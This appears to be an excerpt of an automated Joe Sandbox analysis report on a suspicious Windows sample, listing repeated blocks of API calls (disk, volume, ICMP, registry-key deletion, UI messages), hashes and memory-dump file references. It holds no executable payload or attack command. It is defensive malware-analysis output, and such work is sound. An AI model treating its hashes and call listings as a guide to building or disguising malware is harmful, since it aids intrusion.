                                                                                                                                              • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                                                                                                              • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                                                                              • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                                                                                                              APIs
                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                              • String ID: \VH
                                                                                                                                              • API String ID: 1682464887-234962358
                                                                                                                                              • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                                                                              • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                                                                                                              • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                                                                              • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                                                                                                              APIs
                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                                                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                                                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                              • String ID: \VH
                                                                                                                                              • API String ID: 1682464887-234962358
                                                                                                                                              • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                                                              • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                                                                                                              • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                                                              • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                                                                                                              APIs
                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                                                                                                              • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                                                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorMode$InformationVolume
                                                                                                                                              • String ID: \VH
                                                                                                                                              • API String ID: 2507767853-234962358
                                                                                                                                              • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                                                              • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                                                                                                              • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                                                              • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                                                                                                              APIs
                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                                                                                                              • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                                                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorMode$InformationVolume
                                                                                                                                              • String ID: \VH
                                                                                                                                              • API String ID: 2507767853-234962358
                                                                                                                                              • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                                                                              • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                                                                                                              • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                                                                              • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                                                                                                              APIs
                                                                                                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                                                                                                              • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                                                                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend
                                                                                                                                              • String ID: msctls_trackbar32
                                                                                                                                              • API String ID: 3850602802-1010561917
                                                                                                                                              • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                                                                              • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                                                                                                              • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                                                                              • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                              • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                                                                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                                                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                                                                                                              • String ID: crts
                                                                                                                                              • API String ID: 943502515-3724388283
                                                                                                                                              • Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                                                                                                              • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                                                                                                              • Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                                                                                                              • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                                                                                                              APIs
                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                                                                                                              • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                                                                                                              • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorMode$LabelVolume
                                                                                                                                              • String ID: \VH
                                                                                                                                              • API String ID: 2006950084-234962358
                                                                                                                                              • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                                                              • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                                                                                                              • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                                                              • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                              • GetMenuItemInfoW.USER32 ref: 00449727
                                                                                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                                                                                                              • DrawMenuBar.USER32 ref: 00449761
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Menu$InfoItem$Draw_malloc
                                                                                                                                              • String ID: 0
                                                                                                                                              • API String ID: 772068139-4108050209
                                                                                                                                              • Opcode ID: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                                                                                                                              • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                                                                                                              • Opcode Fuzzy Hash: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                                                                                                                              • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _wcslen$_wcscpy
                                                                                                                                              • String ID: 3, 3, 8, 1
                                                                                                                                              • API String ID: 3469035223-357260408
                                                                                                                                              • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                                                                                              • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                                                                                                              • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                                                                                              • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                              • String ID: ICMP.DLL$IcmpCloseHandle
                                                                                                                                              • API String ID: 2574300362-3530519716
                                                                                                                                              • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                                                                              • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                                                                                                              • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                                                                              • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                              • String ID: ICMP.DLL$IcmpCreateFile
                                                                                                                                              • API String ID: 2574300362-275556492
                                                                                                                                              • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                                                                              • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                                                                                                              • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                                                                              • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                              • String ID: ICMP.DLL$IcmpSendEcho
                                                                                                                                              • API String ID: 2574300362-58917771
                                                                                                                                              • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                                                                              • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                                                                                                              • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                                                                              • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                              • API String ID: 2574300362-4033151799
                                                                                                                                              • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                                                              • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                                                                                                              • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                                                              • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                                                                                                              APIs
                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 0047950F
                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00479650
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Variant$AllocClearCopyInitString
                                                                                                                                              • String ID:
